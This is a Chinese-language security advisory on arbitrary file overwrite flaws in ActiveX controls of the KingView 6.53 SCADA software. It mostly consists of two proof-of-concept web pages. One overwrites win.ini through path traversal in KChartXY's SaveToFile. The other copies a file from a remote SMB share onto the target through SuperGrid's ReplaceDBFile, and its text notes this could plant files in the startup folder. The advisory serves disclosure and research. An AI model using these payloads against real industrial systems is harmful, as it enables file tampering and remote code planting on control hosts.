发布日期:2013-09-04
更新日期:2013-09-17
受影响系统:
Wellintech KingView 6.53
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 62419
Kingview是亚控公司推出的第一款针对中小型项目推出的用于监视与控制自动化设备和过程的SCADA产品。
KingView 6.53没有正确过滤用户输入,在实现上存在多个任意文件覆盖漏洞。攻击者可将任意文件保存在受影响应用上下文计算机上。
<*来源:Blake
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!--
KingView ActiveX Control (KChartXY) Remote File Creation / Overwrite
Vendor:
Version: KingView 6.53
Tested on: Windows XP SP3 / IE
Download:
Author: Blake
CLSID: A9A2011A-1E02-4242-AAE0-B239A6F88BAC
ProgId: KCHARTXYLib.KChartXY
Path: C:\Program Files\KingView\KChartXY.ocx
MemberName: SaveToFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented
Description: Proof of concept overwrites the win.ini file
-->
<html>
<object classid='clsid:A9A2011A-1E02-4242-AAE0-B239A6F88BAC' ></object>
<script language='vbscript'>
arg1="..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini"
target.SaveToFile arg1
</script>
<html>
<object classid='clsid:F494550F-A028-4817-A7B5-E5F2DCB4A47E'></object>
<!--
KingView Insecure ActiveX Control - SuperGrid
Vendor:
Version: KingView 6.53
Tested on: Windows XP SP3 / IE
Download:
Author: Blake
CLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E
ProgId: SUPERGRIDLib.SuperGrid
Path: C:\Program Files\KingView\SuperGrid.ocx
MemberName: ReplaceDBFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented
-->
<title>KingView Insecure ActiveX Control Proof of Concept - SuperGrid.ocx</title>
<p>This proof of concept will copy any arbritrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (ie from an attacker share to the startup folder). It can also be used to overwrite existing files.</p>
<input type=button value="Do It!">
<script>
function copyfile()
{
var file1 = "\\\\192.168.1.165\\share\\poc.txt"; //source
var file2 = "c:\\WINDOWS\\poc.txt"; //destination
result = target.ReplaceDBFile(file1,file2);
}
</script>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Wellintech
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: